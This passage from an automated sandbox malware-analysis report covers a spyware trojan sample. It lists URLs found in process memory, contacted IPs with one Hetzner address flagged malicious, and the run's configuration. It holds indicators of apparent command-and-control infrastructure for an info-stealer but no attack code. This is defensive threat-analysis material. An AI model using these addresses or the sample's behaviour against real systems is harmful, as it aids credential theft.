                                                                      http://anglebug.com/4633chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7382chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drfalse
                                                                            		high
                                                                            https://issuetracker.google.com/284462263chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://deff.nelreports.net/api/report?cat=msnReporting and NEL.22.dr, 2cc80dabc69f58b6_0.20.drfalse
                                                                                		high
                                                                                https://google-ohttp-relay-join.fastly-edge.com/=chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://deff.nelreports.net/api/reportReporting and NEL.22.drfalse
                                                                                    		high
                                                                                    https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://google-ohttp-relay-join.fastly-edge.com/Gchrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555996433.000003C8011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C80106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556765584.000003C800A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556827234.000003C800EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                            		high
                                                                                            https://docs.google.com/document/:chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.youtube.com13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                  		high
                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Dchrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.22.drfalse
                                                                                                      		high
                                                                                                      https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://anglebug.com/7714chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.instagram.com13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                            		high
                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/Nchrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Qchrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://195.201.141.106LocalFine.com, 0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://anglebug.com/6248chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                        		high
                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Xchrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://outlook.office.com/mail/compose?isExtension=true13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/6929chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/5281chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/bchrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://i.y.qq.com/n2/m/index.html13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.deezer.com/13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                      		high
                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/echrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://issuetracker.google.com/255411748chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://web.telegram.org/13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                            		high
                                                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://anglebug.com/7246chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://anglebug.com/7369chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://195.201.141.106R9Fine.com, 0000000B.00000002.2939843523.000000000447D000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://anglebug.com/7489chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://chrome.google.com/webstorechrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2740945971.000039F800020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.20.dr, offscreendocument_main.js.20.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://drive-daily-2.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2555840870.000003C80117C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555996433.000003C8011DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556568639.000003C8011A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2555951253.000003C80118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C80106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556765584.000003C800A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556018251.000003C801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556827234.000003C800EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.20.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fine.com, 0000000B.00000002.2938149780.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.dr, Web Data.20.dr, XLFUAS.11.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.autoitscript.com/autoit3/XFine.com, 0000000B.00000000.2087146090.00000000002A5000.00000002.00000001.01000000.00000009.sdmp, Closely.0.dr, Fine.com.2.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://issuetracker.google.com/161903006chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.ecosia.org/newtab/Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.11.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://drive-daily-1.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://195.201.141.106/qFine.com, 0000000B.00000002.2935633690.0000000000E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://excel.new?from=EdgeM365Shoreline13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://drive-daily-5.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/3078chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/7553chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/5375chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/5371chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/4722chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refFine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000013.00000002.2740945971.000039F800020000.00000004.00000800.00020000.00000000.sdmp, manifest.json.20.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 0000000F.00000003.2549031291.000003C8004E0000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.20.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Fine.com, 0000000B.00000002.2935633690.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.000000000408F000.00000004.00000800.00020000.00000000.sdmp, DJMYUA.11.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://msn.comXIDv10Cookies.22.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://bard.google.com/13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://116.203.165.251Fine.com, 0000000B.00000003.2441321400.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2935633690.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2937261877.0000000004010000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441368651.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441264032.0000000004313000.00000004.00000800.00020000.00000000.sdmp, Fine.com, 0000000B.00000002.2939843523.0000000004311000.00000040.00001000.00020000.00000000.sdmp, Fine.com, 0000000B.00000003.2441646535.00000000040BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/%chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/6692chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://issuetracker.google.com/258207403chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/3502chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://anglebug.com/3623chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://www.office.com13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/3625chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://outlook.live.com/mail/0/13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://anglebug.com/3624chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://docs.google.com/presentation/Jchrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://anglebug.com/5007chrome.exe, 0000000F.00000003.2553218285.000003C800EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDJMYUA.11.drfalse
                                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        142.250.185.228
                                                                                                                                                                                                                                        		www.google.comUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.217.18.14
                                                                                                                                                                                                                                        		play.google.comUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        23.49.251.20
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                        18.244.18.27
                                                                                                                                                                                                                                        		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        18.238.49.99
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        23.43.85.42
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		3257GTT-BACKBONEGTTDEfalse
                                                                                                                                                                                                                                        162.159.61.3
                                                                                                                                                                                                                                        		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        195.201.141.106
                                                                                                                                                                                                                                        		unknownGermany
                                                                                                                                                                                                                                        		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                        20.110.205.119
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        204.79.197.219
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        13.89.179.13
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        142.250.185.110
                                                                                                                                                                                                                                        		plus.l.google.comUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        23.43.85.10
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		3257GTT-BACKBONEGTTDEfalse
                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                                                                                        142.250.185.97
                                                                                                                                                                                                                                        		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse

                                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                                        Analysis ID:1589496
                                                                                                                                                                                                                                        Start date and time:2025-01-12 17:21:09 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 8m 19s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:33
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:mNPTwHOuvT.exe
                                                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                                                        Original Sample Name:2db319e8bfd0b40bb3ac999cf4e6670c.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@89/291@27/18
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                                                                                                        • Number of executed functions: 76
                                                                                                                                                                                                                                        • Number of non-executed functions: 305
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.18.99, 142.250.110.84, 142.250.186.110, 142.250.181.238, 142.250.185.206, 142.250.74.195, 142.250.186.42, 142.250.186.170, 142.250.185.234, 172.217.18.106, 142.250.186.138, 142.250.185.202, 172.217.18.10, 142.250.181.234, 142.250.184.202, 142.250.186.74, 142.250.184.234, 142.250.185.106, 142.250.186.106, 142.250.185.170, 216.58.206.42, 172.217.16.202, 142.250.184.206, 142.250.185.138, 142.250.74.202, 216.58.212.138, 216.58.206.74, 142.250.185.74, 204.79.197.203, 13.107.42.16, 216.58.206.46, 13.107.21.239, 204.79.197.239, 13.107.6.158, 2.16.168.107, 2.16.168.113, 98.64.238.3, 88.221.110.195, 88.221.110.179, 2.23.227.215, 2.23.227.208, 2.23.227.213, 2.23.227.216, 2.21.65.154, 2.21.65.132, 13.74.129.1, 13.107.21.237, 204.79.197.237, 2.16.168.122, 2.16.168.115, 48.209.180.244, 199.232.210.172, 142.250.65.227, 142.250.80.3, 142.251.41.3, 142.251.40.195, 142.250.72.99, 13.91.96.185, 4.175.87.197, 13.107.246.45, 23.1.237.91, 184.28.90
